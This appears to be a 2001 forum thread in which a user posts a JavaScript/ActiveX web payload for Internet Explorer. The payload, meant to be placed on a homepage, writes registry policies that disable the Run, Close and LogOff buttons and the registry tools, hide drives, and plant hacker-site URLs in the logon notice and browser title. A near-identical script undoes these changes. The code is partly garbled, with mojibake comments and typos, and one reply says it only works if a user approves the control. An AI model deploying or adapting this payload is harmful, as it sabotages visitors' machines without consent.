Results 1 to 3 of 3

Thread: A bug of IEon html

  1. #1
    Junior Member
    Join Date
    Aug 2001
    Posts
    1

    A bug of IEon html

    If we save files of hrml as txt .jpg .gif .bmp .stm,IE can run them!
    If we write that on our honepage!Horrible thing will happen
    document.write("");

    function AddFavLnk(loc, DispName, SiteURL)
    {
    var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
    Shor.TargetPath = SiteURL;
    Shor.Save();
    }
    function f(){
    try
    {

    ActiveX initialization
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Net = a1.GetObject();


    try
    {
    if (documents .cookies.indexOf("Chg") == -1)
    {

    //Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
    "http://com.6to23.com/");
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"

    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\Explorer\\NoRun", 01, "REG_BINARY"); //Ïû³ýRUN°´Å¦
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\Explorer\\NoClose", 01, "REG_BINARY"); //Ïû³ý¹Ø±Õ°´Å¦
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\Explorer\\NoLogOff", 01, "REG_BINARY"); //Ïû³ý×¢Ïú°´Å¦
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\Explorer\\NoDrives", "63000000", "REG_DWORD"); //Òþ²ØÅÌ·û
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\System\\DisableRegistryTools", "00000001", "REG_DWORD"); //½ûÖ¹×¢²á±*
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\WinOldApp\\Disabled", "00000001", "REG_DWORD");
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\WinOldApp\\NoRealMode", "00000001", "REG_DWORD");
    Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
    \\LegalNoticeCaption", "ÄúµÄ¼ÆËã»úÒѾ*±»http://www.cnhack.org/ÓÅ»¯: £©");
    Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
    \\LegalNoticeText", "ÄúµÄ¼ÆËã»úÒѾ*±»http://www.cnhack.org/ÓÅ»¯: £©");
    //ÉèÖÿª»úÌáʾ
    Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title",
    "еıêÌâ¡ïhttp://com.6to23.com/ & http://www.cnhack.org/");
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title",
    "еıêÌâ¡ïhttp://com.6to23.com/ & http://www.cnhack.org/");
    //ÉèÖÃIE±êÌâ
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
    }
    }
    catch(e)
    {}
    }
    catch(e)
    {}
    }
    function init()
    {
    setTimeout("f()", 1000);
    }

    init();

    ÒÔÏÂÊÇÀûÓÃÒ»¶ÎÀ*ËƵÄJavaScript´úÂëÐÞ¸´¸÷ÏîµÄ¼üÖµ£º

    document.write("");

    function AddFavLnk(loc, DispName, SiteURL)
    {
    var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
    Shor.TargetPath = SiteURL;
    Shor.Save();
    }
    function f(){
    try
    {
    ActiveX initialization
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Net = a1.GetObject();

    try
    {
    if (documents .cookies.indexOf("Chg") == -1)
    {

    //Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
    "http://com.6to23.com/");
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"

    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\Explorer\\NoRun", 00, "REG_BINARY"); //ÐÞ¸´RUN°´Å¦
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\Explorer\\NoClose", 00, "REG_BINARY"); //ÐÞ¸´¹Ø±Õ°´Å¦
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\Explorer\\NoLogOff", 00, "REG_BINARY"); //ÐÞ¸´×¢Ïú°´Å¦
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\Explorer\\NoDrives", "00000000", "REG_DWORD"); //È¡ÏûÒþ²ØÅÌ·û
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\System\\DisableRegistryTools", "00000000", "REG_DWORD"); //È¡Ïû½ûÖ¹×¢²á±*
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\WinOldApp\\Disabled", "00000001", "REG_DWORD");
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
    \\WinOldApp\\NoRealMode", "00000001", "REG_DWORD");
    Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
    \\LegalNoticeCaption", "");
    Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
    \\LegalNoticeText", "");
    //ÖØÉ迪»úÌáʾ
    Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title",
    "Microsoft Internet Explorer");
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title",
    "Microsoft Internet Explorer"); //ÖØÉèIE±êÌâ
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
    }
    }
    catch(e)
    {}
    }
    catch(e)
    {}
    }
    function init()
    {
    setTimeout("f()", 1000);
    }

    init();
    wherever I go,whatever I do,I\'m a hacker!!!!!

  2. #2
    Banned
    Join Date
    Aug 2001
    Location
    Yes
    Posts
    4,424
    Does anyone know what he's talking about?

  3. #3
    Banned
    Join Date
    Jul 2001
    Posts
    264
    What you posted will not work. You cannot run shell commands, reg entries, etc. through a client browser without a signed ActiveX control. The only way that will work is *if* the user is lame enough to O.k. the control.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •